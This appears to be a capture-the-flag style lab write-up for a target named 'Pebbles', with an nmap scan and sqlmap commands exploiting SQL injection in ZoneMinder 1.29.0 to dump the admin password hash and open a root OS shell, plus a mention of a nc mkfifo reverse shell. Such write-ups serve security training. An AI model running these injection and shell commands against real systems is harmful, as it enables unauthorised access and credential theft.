Pebbles

Intro

Initial Foothold

Full TCP Port Scan

# Nmap 7.94SVN scan initiated Fri Apr 12 09:23:41 2024 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/joe/hax/pg/results/pebbles.pg/scans/_full_tcp_nmap.txt -oX /home/joe/hax/pg/results/pebbles.pg/scans/xml/_full_tcp_nmap.xml pebbles.pg
adjust_timeouts2: packet supposedly had rtt of -645411 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -645411 microseconds.  Ignoring time.
Nmap scan report for pebbles.pg (192.168.247.52)
Host is up, received user-set (0.040s latency).
Scanned at 2024-04-12 09:23:42 CDT for 113s
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE REASON         VERSION
21/tcp   open  ftp     syn-ack ttl 61 vsftpd 3.0.3
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTlsFY1sjAxyC1lqlzeHAaSC0ec76cB5Hoq6aVwMNphXzrhslKqJJ5L0sjOjQem02G6wukOQ/qIVzUZOPxdn4tlN+YuCRqrE7nSIj36hh6JeG4cI9t3qOJUPndLKuKSyJKwV1Dl7gQKcjS0gxO6kWybHMf4CT9a8QsF8mLDPNU3p5VfsEdrgJ+q5hNOmLYJPqwIHTdCweuSwaORn9wQGlmKphGZJlktEKEPwecDZO5KUc6g3N23G+vWv2uCmAw9ov8AQrePxdjz5/QQ8PdY6zedwcLUFjmL5jx9UhZLhDDf/pzP0wiswgm7DZXG6WHwMCbxNo0zX4/HFDswDHc/W+J
|   256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOrgGvGclvZKKtoTk+H0ojQxTTSKljSVFLY8udD6Cb8OQLjgd5F48Em8sa7JjoCa4Mn3USw7EttQLL9a1RNEgio=
|   256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBSm8eCxMlgt56SQ1z3TjY8R0ZY2MMMlYTB4Bby39xXE
80/tcp   open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Pebbles
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 7EC7ACEA6BB719ECE5FCE0009B57206B
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
3305/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
8080/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-favicon: Apache Tomcat
|_http-title: Tomcat
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|4.X (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.11 - 4.1 (88%), Linux 4.4 (88%), Linux 3.2.0 (85%), Linux 3.16 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94SVN%E=4%D=4/12%OT=21%CT=%CU=%PV=Y%DS=4%DC=T%G=N%TM=6619445F%P=x86_64-pc-linux-gnu)
SEQ(SP=108%GCD=1%ISR=10C%TI=Z%TS=8)
OPS(O1=M551ST11NW7%O2=M551ST11NW7%O3=M551NNT11NW7%O4=M551ST11NW7%O5=M551ST11NW7%O6=M551ST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%TG=40%W=7210%O=M551NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)

Uptime guess: 0.005 days (since Fri Apr 12 09:19:05 2024)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   39.62 ms 192.168.45.1
2   39.54 ms 192.168.45.254
3   39.88 ms 192.168.251.1
4   39.80 ms pebbles.pg (192.168.247.52)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 12 09:25:35 2024 -- 1 IP address (1 host up) scanned in 114.29 seconds

Open Ports

  • 21/tcp - vsftpd 3.0.3

  • 22/tcp - OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

  • 80/tcp - Apache httpd 2.4.18 ((Ubuntu))

  • 3305/tcp - Apache httpd 2.4.18 ((Ubuntu))

  • 8080/tcp - Apache httpd 2.4.18 ((Ubuntu))

Testing 21/tcp

No anonymous logon available

Credentials admin/admin did not result in access

Testing 22/tcp

No brute forcing performed yet

Testing 80/tcp

Login form was available on landing page

Login form not vulnerable to SQLi up to Level/Risk 2 via sqlmap

Found interesting directory - zm (ZoneMinder application)

Testing 8080/tcp

No login page observed

Found interesting directory - zm (ZoneMinder application)

Testing 3305/tcp

No login page observed

Found interesting directory - zm (ZoneMinder application)

Performed SQLi on ZoneMinder 1.29.0

sqlmap -u 'http://pebbles.pg:3305/zm/index.php' --data 'view=request&request=log&task=query&limit=100' -p 'limit' -D 'zm' -T 'Users' -C Userna
me,Password --dump
...
[10:12:07] [INFO] cracked password 'admin' for user 'admin'                                                                                      
Database: zm                                                                                                                                     
Table: Users
[1 entry]
+----------+---------------------------------------------------+
| Username | Password                                          |
+----------+---------------------------------------------------+
| admin    | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 (admin) |
+----------+---------------------------------------------------+

Attempting --os-shell option in sqlmap

sqlmap -u 'http://pebbles.pg:3305/zm/index.php' --data 'view=request&request=log&task=query&limit=100' -p 'limit' --os-shell                  
        ___                                                                                                                                       
       __H__                                                                                                                                      
 ___ ___["]_____ ___ ___  {1.8.3#stable}                                                                                                          
|_ -| . [)]     | .'| . |                                                                                                                         
|___|_  [']_|_|_|__,|  _|                                                                                                                         
      |_|V...       |_|   https://sqlmap.org                                                                                                      
                                                                                                                                                  
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey a
ll applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this progra
m                                                                                                                                                 
                                                                                                                                                  
[*] starting @ 11:05:08 /2024-04-12/                                                                                                              
                                                                                                                                                  
[11:05:08] [INFO] resuming back-end DBMS 'mysql'                                                                                                  
[11:05:08] [INFO] testing connection to the target URL                                                                                            
you have not declared cookie(s), while server wants to set its own ('ZMSESSID=muf90i9ed6t...1llf5i72a1;zmSkin=classic;zmCSS=classic'). Do you want
 to use those [Y/n] Y                                                                                                                             
sqlmap resumed the following injection point(s) from stored session:                                                                              
---                                                                                                                                               
Parameter: limit (POST)                                                                                                                           
    Type: stacked queries                                                                                                                         
    Title: MySQL >= 5.0.12 stacked queries (comment)                                                                                              
    Payload: view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#                                                                       
---                                                                                                                                               
[11:05:10] [INFO] the back-end DBMS is MySQL                                                                                                      
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)                                                                      
web application technology: Apache 2.4.18                                                                                                         
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)                                                                                                     
[11:05:10] [INFO] fingerprinting the back-end DBMS operating system                                                                               
[11:05:10] [INFO] the back-end DBMS operating system is Linux                                                                                     
[11:05:10] [INFO] testing if current user is DBA   
[11:05:10] [INFO] fetching current user
[11:05:10] [INFO] resumed: root@localhost
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[11:05:15] [INFO] checking if UDF 'sys_exec' already exist
[11:05:15] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                   
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N] y
[11:05:29] [INFO] checking if UDF 'sys_eval' already exist
[11:05:29] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[11:05:29] [INFO] detecting back-end DBMS version from its banner
[11:05:29] [INFO] resumed: 5.7.30-0ubuntu0.16.04.1
[11:05:29] [INFO] retrieving MySQL plugin directory absolute path
[11:05:29] [INFO] resumed: /usr/lib/mysql/plugin/
[11:05:32] [INFO] retrieved: 
[11:05:42] [INFO] adjusting time delay to 1 second due to good response times
8040
[11:05:50] [INFO] the local file '/tmp/sqlmapsu8jrs7w61063/lib_mysqludf_sysjm3mu5i0.so' and the remote file '/usr/lib/mysql/plugin/libsbtnb.so' have the same size (8040 B)
[11:05:50] [INFO] creating UDF 'sys_exec' from the binary UDF file
[11:05:50] [INFO] creating UDF 'sys_eval' from the binary UDF file
[11:05:50] [INFO] going to use injected user-defined functions 'sys_eval' and 'sys_exec' for operating system command execution
[11:05:50] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
[11:06:03] [INFO] retrieved: root
command standard output: 'root'
os-shell> cat /root/proof.txt
do you want to retrieve the command standard output? [Y/n/a] Y
[11:06:33] [INFO] retrieved: 7574772785970f747047e659aa85b43a
command standard output: '7574772785970f747047e659aa85b43a'

Catching reverse shell, run nc mkfifo revshell command via sqlmap's --os-shell

Privilege Escalation

No privilege escalation required

Last updated